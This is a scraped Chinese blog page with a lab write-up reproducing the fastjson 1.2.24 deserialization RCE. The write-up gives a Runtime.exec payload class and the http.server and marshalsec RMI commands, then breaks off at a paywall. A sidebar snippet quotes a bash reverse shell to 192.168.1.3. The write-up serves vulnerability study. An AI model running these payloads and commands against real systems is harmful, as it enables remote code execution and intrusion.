追洞小组 | fastjson1.2.24复现+分析

最新推荐文章于 2024-04-17 11:42:59 发布
最新推荐文章于 2024-04-17 11:42:59 发布
阅读量2.7k 收藏 2
点赞数 1
文章标签: java 安全 javascript jvm go
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/114421992
版权

网络安全知识小百科,就点上方蓝字关注我们

文章来源|MS08067 WEB攻防知识星球

本文作者:爱吃芝士的小葵(Ms08067实验室追洞小组成员)

漏洞复现分析  认准追洞小组

1、靶场搭建

2、漏洞复现

3、漏洞分析

4、漏洞修复

5、心得


靶场搭建

使用idea maven项目创建,在pom中导入fastjson的坐标。(因为本文复现1.2.24的rce,所以版本要小于1.2.24,本文采 取1.2.23版本坐标)。

导入之后在右边点击maven图标导入。

坑点

其中环境有一个非常细小的点,可以说是个大坑,我调试了很久,之前的报错如下:

1、rmi+jndi环境:java.sql.SQLException: JdbcRowSet (连接) JNDI 无法连接 2、ldap+jndi环境:java.lang.ClassCastException: javax.naming.Reference cannot be cast to javax.sql.DataSource

后来才发现是java的环境没有配置对,虽然都是jdk1.8,但是复现的环境采用1.8.0_102,之前的环境1.8.0_221没有复现成 功。因为JDK 8u113 之后,系统属性 com.sun.jndi.rmi.object.trustURLCodebase 、  com.sun.jndi.cosnaming.object.trustURLCodebase 的默认值变为false,即默认不允许RMI、cosnaming从远程的 Codebase加载Reference工厂类。


漏洞复现

一、准备被远程下载的class文件

这边简单弹个计算器,也可以反弹shell

package com.v1rus;


public class Calc{
public Calc(){
try{
Runtime.getRuntime().exec("calc");
}catch (Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Calc c = new Calc();
}
}

命令行输入 javac Calc.java ,在当前文件夹下会生成Calc.class文件。

二、 http服务

可以简单的用python3在当前Calc.class文件的文件夹下起http服务

python -m http.server 8088

三、RMI服务

使用marshalsec起rmi服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.249.156:8088/#Calc" 8

简而言之就是将class文件放到了http服务上,再用rmi服务绑定该class文件,并将rmi服务的端口应用在8888端口上。

漏洞分析

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

首先放上服务端使用的poc demo:




                

        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  Ms08067安全实验室
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    1
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    2
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
fastjson1.2.24 反序列化漏洞原理、环境搭建、利用图

				
			

			

				

					Cwillchris的博客
				

				

					03-17
					
					618
					
				

			

		

		

			
				
6、目标机获取HackerFile文件内容并执行,HackerFile文件包含反弹shenll命令(/bin/bash","-c","bash -i >& /dev/tcp/192.168.1.3/5555 0>&1)1、kali(192.168.1.3)作为用户,访问目标机192.168.1.10:8090,并提交恶意数据rmi://192.168.1.3:6666。抓包修改请求方法为POST,最下面空一行添加{"name":"Cwillchris", "age":20},即可更新服务端的信息。

			
		

	



                

              
                



	

		

			

				
					
java安全学习笔记--fastjson1.2.24反序列化漏洞两种利用链分析(TemplatesImpl,JdbcRowSetImpl)

				
			

			

				

					m0_64685672的博客
				

				

					02-03
					
					2793
					
				

			

		

		

			
				
测试环境


jdk1.7

fastjson 1.2.24


Fastjson简介及用法

Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,常用在前后端分离的项目中,用来处理前端传来的json数据,JSON字符串和Java对象的转换就是基于序列化和反序列化来实现的。

演示代码:


package com.test;

        import com.alibaba.fastjson.JSON;
      

			
		

	



                


  
              

                


	

		

			

				
					
fastjson1.2.24反序列化漏洞复现,验证JdbcRowSetImpl

				
			

			

				

					liu649983697的专栏
				

				

					05-30
					
					1487
					
				

			

		

		

			
				
fastjson反序列化漏洞复现、实验、验证,远程命令调用、漏洞攻击

			
		

	





	

		

			

				
					
Fastjson 1.2.24反序列化漏洞复现

				
			

			

				

					weixin_60830484的博客
				

				

					04-17
					
					357
					
				

			

		

		

			
				
本文将进行一次详细的Fastjson 1.2.24反序列化漏洞复现

			
		

	



		

			
		



	

		

			

				
					
fastjson1.2.24代码分析

				
			

			

				

					weixin_45682070的博客
				

				

					12-27
					
					470
					
				

			

		

		

			
				
123
fastjson反序列化成因
fastjson 自动调用getter和setter
类似Java的反序列化过程会自动调用readObject函数,fastjson还原对象时也会自动调用以下几个函数:
无参数的构造函数
符合条件的getter函数
符合条件的setter函数

这里需要区别的是fastjson所使用的parse函数和parseObject函数所调用的函数条件是不一样的
代码浅析
        //通过parseObject,不指定类,返回的是一个JSONObject
        

			
		

	





	

		

			

				
					
Fastjson反序列化漏洞分析

					
热门推荐

				
			

			

				

					fly小灰灰的专栏
				

				

					07-30
					
					1万+
					
				

			

		

		

			
				
1. 漏洞描述
漏洞简述: 2017年3月15日,fastjson官方主动爆出fastjson1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。
影响版本: fastjson <= 1.2.24
2. 漏洞简介  java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjson,fastj

			
		

	





	

		

			

				
					
FastJson1.2.24漏洞复现(详细步骤)

				
			

			

				

					qq_35713681的博客
				

				

					07-28
					
					374
					
				

			

		

		

			
				
此测试用的是VM搭的Kali 2023.2。

			
		

	





	

		

			

				
					
fastjson1.2.24反序列化RCE

					
最新发布

				
			

			

				

					06-24
				

			

		

		

			
				
**Fastjson 1.2.24 反序列化远程代码执行漏洞详解**  在Java开发中,Fastjson是一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本...

			
		

	





	

		

			

				
					
fastjson1.2.24含源码

				
			

			

				

					02-04
				

			

		

		

			
				
《深入解析Fastjson 1.2.24Fastjson是阿里巴巴开发的一款高性能的Java JSON库,它具有极快的性能,广泛的功能以及简洁易用的API,使其在Java社区中广受欢迎。Fastjson 1.2.24版本是其发展过程中的一个重要里程碑...

			
		

	





	

		

			

				
					
fastjson-1.2.24.jar

				
			

			

				

					02-24
				

			

		

		

			
				
java运行依赖jar包

			
		

	





	

		

			

				
					
fastjson-1.2.24

				
			

			

				

					04-24
				

			

		

		

			
				
Fastjson 1.2.24版本中,针对之前的安全漏洞进行了修复,增强了其安全性。开发者应定期更新Fastjson以确保应用的安全性。  7. 性能优化 Fastjson在设计时充分考虑了性能,如使用直接操作字节码的技术来提升速度,...

			
		

	





	

		

			

				
					
解决tomcat中jndi无法获取的几种方法

				
			

			

				

					fwk_love的博客
				

				

					09-21
					
					2156
					
				

			

		

		

			
				
https://www.e-learn.cn/content/wangluowenzhang/296596

			
		

	





	

		

			

				
					
JNDI实现服务器(tomcat)与数据库(mysql)连接的数据源配置以及获取连接java代码...

				
			

			

				

					weixin_30702887的博客
				

				

					10-20
					
					262
					
				

			

		

		

			
				
->首先将mysql的jar包导入到tomcat/lib文件夹下

->然后在tomcat/conf/context.xml文件中配置以下内容

<Resource
    name="jdbc/mysql"
    auth="Container"
    type="javax.sql.DataSource"
    maxActive="100"
    ...

			
		

	





	

		

			

				
					
Java技术回顾之JDBC:ResultSetRowSet

				
			

			

				

					EricXYY Memo
				

				

					12-24
					
					3830
					
				

			

		

		

			
				
 ResulSet类型和选项Connection提供了三种不同的方法来创建Statement:createStatement() createStatement(int resultSetType, int resultSetConcurrency) createStatement(int resultSetType, int resultSetConcurrency, int resultSet

			
		

	





	

		

			

				
					
JDBC  (c3p0、dbcp、jndi及不使用连接池)

				
			

			

				

					hua_yuan2015的博客
				

				

					10-28
					
					4238
					
				

			

		

		

			
				
以下对java连接mysql数据库进行总结,包括c3p0、dbcp、jndi及不使用连接池的的连接方式(下文简称jdbc)。
1.不使用连接池方式(Jdbc)
1.1 工具类(JdbcUtil.java)
package com.jdbc.util;

import java.io.IOException;
import java.io.InputStream;
import jav

			
		

	





	

		

			

				
					
错误JDBCTransaction cannot be cast to javax.transaction.Transaction解决方法

				
			

			

				

					weixin_30855099的博客
				

				

					07-25
					
					297
					
				

			

		

		

			
				
环境:在用Hibernate连接Oracle数据库进行数据存储的时候运行时报错
Exception in thread "main" java.lang.ClassCastException: org.hibernate.transaction.JDBCTransaction cannot be cast to javax.transaction.Transactionat dao.Login...

			
		

	





	

		

			

				
					
java.lang.ClassNotFoundException: javax.transaction.TransactionManager

				
			

			

				

					郭龙飞的学习博客
				

				

					02-21
					
					1762
					
				

			

		

		

			
				
异常:
java.lang.ClassNotFoundException: javax.transaction.TransactionManager。
原因:
缺少geronimo-jta_1.1_spec-1.1.1.jar包。
Maven下载地址:
&lt;dependency&gt;
		    &lt;groupId&gt;org.apache.geronimo.specs&lt;/gro...

			
		

	





	

		

			

				
					
fastjson1.2.24漏洞复现

				
			

			

				

					07-27
				

			

		

		

			
				
对于Fastjson 1.2.24版本的漏洞复现,根据引用\[1\]和引用\[2\]的信息,该版本存在安全漏洞,攻击者可以利用fastjson autotype在处理json对象时,未对@type字段进行安全性验证,从而执行恶意代码。为了修复这个漏洞...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值